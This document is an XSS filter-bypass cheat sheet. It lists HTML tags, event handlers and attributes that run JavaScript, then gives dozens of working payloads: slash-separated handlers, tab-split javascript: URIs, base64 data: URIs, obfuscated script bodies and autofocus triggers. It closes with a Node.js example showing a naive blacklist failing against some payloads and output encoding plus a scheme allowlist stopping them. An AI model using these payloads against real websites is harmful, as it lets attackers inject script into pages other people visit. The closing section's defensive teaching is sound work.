Bypassing XSS filters
In the XSS world there are many tags, events and attributes that can be used to execute JS.
- Tags that can execute JS
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio>
- Events that execute JS (not exhaustive; the payloads below also rely on onerror, onscroll and onstart)
onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondblclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop onerror
- Attributes that can execute JS (they take a URL, or, like autofocus, trigger a handler without user interaction)
formaction action href xlink:href autofocus src content data
Bypassing
- Use any tag to bypass a tag blacklist (browsers fire event handlers on unknown elements too)
<M/onclick="alert(1)">M
- Use "/" instead of spaces
<img/src=x onerror=alert(1)>
- Use a short XSS payload
<b/ondrag=alert()>M
- javascript: and data: URIs in href
<a href=javascript:alert(2)>M
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==> //base64 of <script>alert(3)</script>
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M //URL-encoded <script>alert(29)</script>
<a href=javascript:alert(13)>M
<a href=javascript:confirm(2)>M
(caveat: a data: document gets an opaque origin, so it cannot read the embedding site's cookies or DOM, and current Chrome and Firefox block top-level navigation to data:text/html when page content initiates it)
- Combination with xlink:href
<svg><a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a></svg>
<math><a xlink:href=javascript:alert(1)>M
- script tag
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script> //the argument is the string "alert", assembled from characters of "NaN", "false" and "true"
<script firefox>alert(1)</script> //an unknown attribute on <script> is ignored
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script> //decodes to ~'a'; throw ~this.alert(~'a')
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script> //\u escapes are valid inside JS identifiers, so \u0061lert is alert
<script>prompt(-[])</script>
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(1)',0)</script>
- button tag & html5
<button/onclick=alert(1) >M</button>
<form><button formaction=javascript:alert(1)>M
<button onfocus=alert(1) autofocus> //fires without user interaction
- <p> tag
<p/onmouseover=javascript:alert(1); >M</p>
- <img> tag
<img src ?itworksonchrome?\/onerror = alert(1)>
<img src=x onerror=window.open('http://google.com');>
<img/src/onerror=alert(1)>
<img src="x:kcf" onerror="alert(1)">
- <body> tag
<body onload=alert(1)>
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> //the autofocus scrolls the page down to the input, which fires onscroll
- <var> tag
<var onmouseover="prompt(1)">KCF</var>
- <div> tag
<div/onmouseover='alert(1)'>X
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onclick="alert(52)"> //invisible full-page overlay, any click fires
- <iframe> tag
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
(the browser strips tabs, line feeds and carriage returns from a URL before parsing the scheme, so the same payload also works with a line break, or a line break plus tab, between every character; a filter that looks for the literal string javascript: never sees it)
<iframe SRC="http://0x.lv/xss.swf"></iframe> //a Flash movie; needs a Flash plugin, which current browsers no longer run
<IFRAME SRC="javascript:alert(1);"></IFRAME>
<iframe/onload=alert(53)></iframe>
- <meta> tag
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> //old browsers only; current browsers refuse a javascript: refresh target
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"> //URL-encoded <script>alert(1)</script>; same data: caveats as above
- <object> tag
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object> //base64 of <script>alert("KCF")</script>
- <marquee> tag
<marquee onstart="alert('sometext')"></marquee> //firefox
- <isindex> tag (obsolete element, dropped by current browsers)
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
- <input> tag
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus> //relies on the second autofocus taking focus away from the first, which fires onblur
- <select> tag
<select onfocus=javascript:alert(1) autofocus>
- <textarea> tag
<textarea onfocus=javascript:alert(1) autofocus>
- <keygen> tag (obsolete element, dropped by current browsers)
<keygen onfocus=javascript:alert(1) autofocus>
- <frameset> tag
<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
<frameset onload=alert(1)>
- <embed> tag
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed> //chrome
<embed src=javascript:alert(1)> //firefox
- <svg> tag
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
- <math> tag
<math href="javascript:javascript:alert(1)">CLICKME</math> //the doubled scheme is still valid JS: the second javascript: parses as a label
<math><y/xlink:href=javascript:alert(51)>test1
<math><maction actiontype="statusline#http://wangnima.com" xlink:href="javascript:alert(49)">CLICKME</maction></math>
- <video> tag
<video><source onerror="alert(1)">
<video src=x onerror=alert(48)>
- <audio> tag
<audio src=x onerror=alert(47)>
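Why the tricks above work, as an added example that is not part of the original list: a typical hand-written blacklist (constructed here: a few blocked tag names, event handlers that must follow whitespace, a literal scheme match) is run against payloads copied from the list, next to the contextual encoding and URL scheme allowlist that hold up instead. The filter, the allowlist contents and the helper names are assumptions made for this demonstration; it runs under Node.js with no dependencies.

```javascript
// Added example: a typical hand-written XSS blacklist, the payloads from the
// list above that slip past it, and the contextual encoding / URL allowlist
// that actually holds. Everything here is constructed for the demonstration.

// Naive blacklist (constructed): a few "dangerous" tag names, event handlers
// that must be preceded by whitespace, and a literal match on the scheme.
const BLOCKED_TAGS = ['script', 'img', 'body', 'object', 'embed'];
const tagRe = new RegExp('<\\s*(' + BLOCKED_TAGS.join('|') + ')\\b', 'i');
const eventRe = /\son[a-z]+\s*=/i;         // assumes a space before onXXX=
const schemeRe = /(javascript|data)\s*:/i; // assumes the scheme is spelled out

// Returns null when the input is rejected, otherwise passes it through unchanged.
function naiveFilter(html) {
  if (tagRe.test(html) || eventRe.test(html) || schemeRe.test(html)) return null;
  return html;
}

// Payloads copied from the list above (constructed test input for this example).
const PAYLOADS = [
  '<M/onclick="alert(1)">M',                 // unknown tag, "/" instead of a space
  '<b/ondrag=alert()>M',                     // "/" instead of a space
  '<img/src=x onerror=alert(1)>',            // caught: <img is on the blacklist
  '<iframe src=j\ta\tv\ta\ts\tc\tr\ti\tp\tt:a\tl\te\tr\tt\t%28\t1\t%29></iframe>', // tabs hide javascript:
  '<svg><a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a></svg>', // caught: literal scheme
];

// The payloads the blacklist lets through unchanged.
function bypasses() {
  return PAYLOADS.filter((p) => naiveFilter(p) !== null);
}

// What holds up: encode for the output context instead of hunting for bad
// strings. With these five characters escaped, no tag or attribute can be
// opened from an HTML text or quoted-attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// For an href/src that must remain a URL: allowlist the scheme, after doing
// what the browser's URL parser does first (drop ASCII tab/LF/CR anywhere and
// leading C0 controls or spaces), so the tab-separated "j a v a s c r i p t:"
// trick normalises to javascript: before the check. Run this on the attribute
// value as the HTML parser would see it, i.e. after entity decoding.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto']; // assumption for this example
function isSafeUrl(url) {
  const cleaned = url.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+/, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (!m) return true;                       // no scheme: relative URL
  return ALLOWED_SCHEMES.includes(m[1].toLowerCase());
}

console.log('slipped past the blacklist:', bypasses());
console.log('encoded:', encodeForHtml(PAYLOADS[0]));
console.log('tab-separated javascript: allowed?', isSafeUrl('j\ta\tv\ta\ts\tc\tr\ti\tp\tt:alert(1)'));
```

Three of the five payloads pass the blacklist: the unknown-tag and slash-separator ones because neither regex expects them, and the tab-separated iframe because the scheme string is never contiguous. The encoder neutralises all of them without knowing a single tag name, and the URL check rejects the tab-separated scheme because it normalises the way the browser does before comparing.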